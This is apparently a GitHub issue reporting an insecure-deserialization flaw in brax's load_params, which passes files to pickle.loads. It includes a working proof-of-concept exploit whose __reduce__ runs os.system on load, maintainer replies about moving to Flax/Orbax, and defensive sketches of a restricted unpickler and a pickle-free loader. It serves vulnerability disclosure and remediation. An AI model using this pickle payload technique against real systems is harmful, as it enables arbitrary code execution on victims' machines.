
Insecure deserialization attack via pickle.loads

Open · omidxrz opened this issue 10 months ago · 2 comments

I noticed that the function load_params in brax.io.model passes a user-supplied file directly to pickle.loads. This lets an attacker execute arbitrary system commands on the victim's system through an insecure deserialization attack.

Vulnerable Function

https://github.com/google/brax/blob/69637a359463738140c1b850f61ad0088a23538b/brax/io/model.py#L22

Exploit Code (Attacker Side):

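import pickle
import os

class MaliciousCode:
    def __reduce__(self):
        # pickle calls the returned callable with these args at load time,
        # so unpickling this object runs os.system("ping 'google.com'")
        return (os.system, ("ping 'google.com'",))

# Write the payload to disk; unpickling this file triggers the command
with open('malicious.pkl', 'wb') as f:
    pickle.dump(MaliciousCode(), f)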

Exploit Code (Victim Side):

from brax.io import model
# load_params hands the file contents to pickle.loads, which runs the payload
model.load_params("malicious.pkl")
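As a possible stopgap (separate from any serializer refactor), the "restricting globals" technique from the Python pickle documentation subclasses pickle.Unpickler and overrides find_class, so that only allowlisted globals can be resolved. The minimal sketch below shows that the payload above is rejected while plain containers of numbers still load. SAFE_GLOBALS, RestrictedUnpickler and restricted_loads are hypothetical names, not part of brax. Real brax params are JAX/NumPy arrays whose pickles reference NumPy reconstruction globals, so a usable allowlist would need to cover those, and the pickle docs themselves advise caution when relying on this approach.

```python
import io
import os
import pickle

# Hypothetical allowlist of (module, name) globals the loader may resolve.
# Plain dicts, lists, str, int and float need no globals at all.
SAFE_GLOBALS = frozenset({
    ("builtins", "complex"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        # os.system pickles as e.g. posix.system, so the payload stops here
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Hypothetical replacement for pickle.loads that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class MaliciousCode:
    def __reduce__(self):
        # Same pattern as the exploit above, with a harmless command
        return (os.system, ("echo pwned",))


if __name__ == "__main__":
    params = {"layer": [1.0, 2.0], "step": 3}
    print(restricted_loads(pickle.dumps(params)))  # benign data round-trips
    try:
        restricted_loads(pickle.dumps(MaliciousCode()))
    except pickle.UnpicklingError as err:
        print("blocked:", err)
```

The allowlist fails closed: anything not listed raises instead of being imported, which is the property a params loader needs when the file may come from an untrusted source.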

omidxrz · Jan 08 '25 10:01

Acknowledged, this has been on our TODO list for some time. I implemented Orbax checkpointing in PPO https://github.com/google/brax/blob/d48b0b373a6478838eac325cadc6d8983837a968/brax/training/agents/ppo/train.py#L534 as a start. However, a bigger refactor is needed to bubble this logic up into load_params, since the target state must be provided ahead of time (AOT) when loading the params.

The Flax serializer has a similar requirement: the target must be defined AOT. The right approach is perhaps to drop model.load_params and save_params altogether and rely entirely on a Flax/NNX/Orbax serializer (along with a model config to generate the target pytree).
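To make the "target defined ahead of time" requirement concrete, here is a minimal stdlib-only sketch of target-driven loading. It is not the Flax or Orbax implementation (Flax exposes a similar pattern as flax.serialization.from_bytes(target, encoded_bytes)); dumps_params, loads_params, to_state and restore_into are hypothetical names. It assumes params are nested dicts, lists or tuples of plain numbers, whereas real brax params hold JAX/NumPy arrays. The file stores only data; the structure and container types come from the caller's target, so nothing executable is reconstructed.

```python
import json
from typing import Any


def to_state(tree: Any) -> Any:
    """Convert a nested dict/list/tuple tree of numbers into JSON-safe data."""
    if isinstance(tree, dict):
        return {k: to_state(v) for k, v in tree.items()}
    if isinstance(tree, (list, tuple)):
        return [to_state(v) for v in tree]
    if isinstance(tree, (int, float)):
        return tree
    raise TypeError(f"unsupported leaf type: {type(tree).__name__}")


def restore_into(target: Any, state: Any) -> Any:
    """Rebuild `state` following the structure of `target`, rejecting mismatches."""
    if isinstance(target, dict):
        if not isinstance(state, dict) or set(target) != set(state):
            raise ValueError("stored keys do not match the target's keys")
        return {k: restore_into(v, state[k]) for k, v in target.items()}
    if isinstance(target, (list, tuple)):
        if not isinstance(state, list) or len(state) != len(target):
            raise ValueError("stored sequence does not match the target's length")
        items = [restore_into(t, s) for t, s in zip(target, state)]
        # The container type comes from the target, not from the file
        return tuple(items) if isinstance(target, tuple) else items
    # Leaf: JSON can only yield plain values here, never executable objects
    if not isinstance(state, (int, float)):
        raise TypeError(f"expected a number, got {type(state).__name__}")
    return state


def dumps_params(params: Any) -> str:
    """Hypothetical pickle-free serializer for a params tree."""
    return json.dumps(to_state(params))


def loads_params(target: Any, text: str) -> Any:
    """Hypothetical loader: the caller must supply the target tree up front."""
    return restore_into(target, json.loads(text))
```

For example, loads_params({"w": [0.0, 0.0]}, dumps_params({"w": [0.5, -1.0]})) returns {"w": [0.5, -1.0]}, while a file whose keys differ from the target raises ValueError. This is why the loader needs a model config: without it there is no target tree to restore into.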

Happy to review any PRs if someone wants to take a look.

btaba · Jan 20 '25 07:01

Commit 8526f9a64ee02010615a57a026a7b6aad05cbda0 starts to address this, but we likely won't fully deprecate brax.io.model for some time.

btaba · Jan 31 '25 22:01